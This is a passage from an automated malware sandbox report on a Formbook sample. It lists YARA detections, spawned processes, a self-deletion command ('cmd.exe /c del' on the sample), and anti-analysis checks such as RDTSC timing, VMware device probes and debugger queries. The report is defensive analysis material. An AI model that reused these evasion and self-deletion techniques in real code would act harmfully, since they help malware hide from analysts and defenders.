          Source: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.301567040.00000000004C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.301567040.00000000004C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.234632284.0000000002280000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.234632284.0000000002280000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.493603616.0000000000A90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.493603616.0000000000A90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.494502874.0000000002CF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.494502874.0000000002CF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.301714612.00000000005D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.301714612.00000000005D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.WXs8v9QuE7.exe.2280000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.WXs8v9QuE7.exe.2280000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.WXs8v9QuE7.exe.2280000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.WXs8v9QuE7.exe.2280000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/3@16/10
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 0_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404292
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,0_2_00402053
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1488:120:WilError_01
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeFile created: C:\Users\user\AppData\Local\Temp\nsa7684.tmpJump to behavior
          Source: WXs8v9QuE7.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: WXs8v9QuE7.exeVirustotal: Detection: 18%
          Source: WXs8v9QuE7.exeReversingLabs: Detection: 19%
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeFile read: C:\Users\user\Desktop\WXs8v9QuE7.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\WXs8v9QuE7.exe 'C:\Users\user\Desktop\WXs8v9QuE7.exe'
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeProcess created: C:\Users\user\Desktop\WXs8v9QuE7.exe 'C:\Users\user\Desktop\WXs8v9QuE7.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\WXs8v9QuE7.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeProcess created: C:\Users\user\Desktop\WXs8v9QuE7.exe 'C:\Users\user\Desktop\WXs8v9QuE7.exe' Jump to behavior
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exeJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\WXs8v9QuE7.exe'Jump to behavior
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: Binary string: cscript.pdbUGP source: WXs8v9QuE7.exe, 00000001.00000002.302941895.0000000002AC0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: WXs8v9QuE7.exe, 00000000.00000003.228184886.0000000009990000.00000004.00000001.sdmp, WXs8v9QuE7.exe, 00000001.00000002.302101367.0000000000B8F000.00000040.00000001.sdmp, cscript.exe, 00000012.00000002.495021689.0000000004850000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: WXs8v9QuE7.exe, cscript.exe
          Source: Binary string: cscript.pdb source: WXs8v9QuE7.exe, 00000001.00000002.302941895.0000000002AC0000.00000040.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeUnpacked PE file: 1.2.WXs8v9QuE7.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 0_2_10001D3B GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,lstrcatA,GetProcAddress,0_2_10001D3B
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 0_2_100029F0 push eax; ret 0_2_10002A1E
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_0041624A pushad ; ret 1_2_0041625B
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_0041B3C5 push eax; ret 1_2_0041B418
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_0041B47C push eax; ret 1_2_0041B482
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_0041B412 push eax; ret 1_2_0041B418
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_0041B41B push eax; ret 1_2_0041B482
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_0040B7D2 push ebx; retf 1_2_0040B7D5
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AED0D1 push ecx; ret 1_2_00AED0E4
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_1_0041624A pushad ; ret 1_1_0041625B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048CD0D1 push ecx; ret 18_2_048CD0E4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0057624A pushad ; ret 18_2_0057625B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0057B3C5 push eax; ret 18_2_0057B418
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0057B47C push eax; ret 18_2_0057B482
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0057B412 push eax; ret 18_2_0057B418
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0057B41B push eax; ret 18_2_0057B482
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0056B7D2 push ebx; retf 18_2_0056B7D5
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeFile created: C:\Users\user\AppData\Local\Temp\nsa7685.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 00000000005685F4 second address: 00000000005685FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 000000000056898E second address: 0000000000568994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_004088C0 rdtsc 1_2_004088C0
          Source: C:\Windows\explorer.exe TID: 1848Thread sleep time: -45000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exe TID: 612Thread sleep time: -44000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 0_2_00405E93 FindFirstFileA,FindClose,0_2_00405E93
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004054BD
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 0_2_00402671 FindFirstFileA,0_2_00402671
          Source: explorer.exe, 00000004.00000000.250033211.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000004.00000000.258894278.00000000011B3000.00000004.00000020.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}t
          Source: explorer.exe, 00000004.00000000.258969354.0000000001218000.00000004.00000020.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.250033211.000000000891C000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.249626505.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.261945560.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000004.00000000.258894278.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000004.00000000.250088865.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000004.00000000.249626505.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.268841101.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000004.00000000.249626505.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.250088865.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: explorer.exe, 00000004.00000000.249626505.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_004088C0 rdtsc 1_2_004088C0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00409B30 LdrLoadDll,1_2_00409B30
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 0_2_10001D3B GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,lstrcatA,GetProcAddress,0_2_10001D3B
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD90AF mov eax, dword ptr fs:[00000030h]1_2_00AD90AF
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC20A0 mov eax, dword ptr fs:[00000030h]1_2_00AC20A0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC20A0 mov eax, dword ptr fs:[00000030h]1_2_00AC20A0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC20A0 mov eax, dword ptr fs:[00000030h]1_2_00AC20A0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC20A0 mov eax, dword ptr fs:[00000030h]1_2_00AC20A0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC20A0 mov eax, dword ptr fs:[00000030h]1_2_00AC20A0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC20A0 mov eax, dword ptr fs:[00000030h]1_2_00AC20A0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACF0BF mov ecx, dword ptr fs:[00000030h]1_2_00ACF0BF
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACF0BF mov eax, dword ptr fs:[00000030h]1_2_00ACF0BF
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACF0BF mov eax, dword ptr fs:[00000030h]1_2_00ACF0BF
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A99080 mov eax, dword ptr fs:[00000030h]1_2_00A99080
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B13884 mov eax, dword ptr fs:[00000030h]1_2_00B13884
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B13884 mov eax, dword ptr fs:[00000030h]1_2_00B13884
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A958EC mov eax, dword ptr fs:[00000030h]1_2_00A958EC
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B2B8D0 mov eax, dword ptr fs:[00000030h]1_2_00B2B8D0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B2B8D0 mov ecx, dword ptr fs:[00000030h]1_2_00B2B8D0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B2B8D0 mov eax, dword ptr fs:[00000030h]1_2_00B2B8D0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B2B8D0 mov eax, dword ptr fs:[00000030h]1_2_00B2B8D0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B2B8D0 mov eax, dword ptr fs:[00000030h]1_2_00B2B8D0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B2B8D0 mov eax, dword ptr fs:[00000030h]1_2_00B2B8D0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AAB02A mov eax, dword ptr fs:[00000030h]1_2_00AAB02A
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AAB02A mov eax, dword ptr fs:[00000030h]1_2_00AAB02A
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AAB02A mov eax, dword ptr fs:[00000030h]1_2_00AAB02A
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AAB02A mov eax, dword ptr fs:[00000030h]1_2_00AAB02A
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC002D mov eax, dword ptr fs:[00000030h]1_2_00AC002D
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC002D mov eax, dword ptr fs:[00000030h]1_2_00AC002D
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC002D mov eax, dword ptr fs:[00000030h]1_2_00AC002D
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC002D mov eax, dword ptr fs:[00000030h]1_2_00AC002D
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC002D mov eax, dword ptr fs:[00000030h]1_2_00AC002D
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B64015 mov eax, dword ptr fs:[00000030h]1_2_00B64015
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B64015 mov eax, dword ptr fs:[00000030h]1_2_00B64015
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B17016 mov eax, dword ptr fs:[00000030h]1_2_00B17016
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B17016 mov eax, dword ptr fs:[00000030h]1_2_00B17016
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B17016 mov eax, dword ptr fs:[00000030h]1_2_00B17016
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B61074 mov eax, dword ptr fs:[00000030h]1_2_00B61074
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B52073 mov eax, dword ptr fs:[00000030h]1_2_00B52073
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AB0050 mov eax, dword ptr fs:[00000030h]1_2_00AB0050
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AB0050 mov eax, dword ptr fs:[00000030h]1_2_00AB0050
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC61A0 mov eax, dword ptr fs:[00000030h]1_2_00AC61A0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC61A0 mov eax, dword ptr fs:[00000030h]1_2_00AC61A0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B151BE mov eax, dword ptr fs:[00000030h]1_2_00B151BE
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B151BE mov eax, dword ptr fs:[00000030h]1_2_00B151BE
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B151BE mov eax, dword ptr fs:[00000030h]1_2_00B151BE
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B151BE mov eax, dword ptr fs:[00000030h]1_2_00B151BE
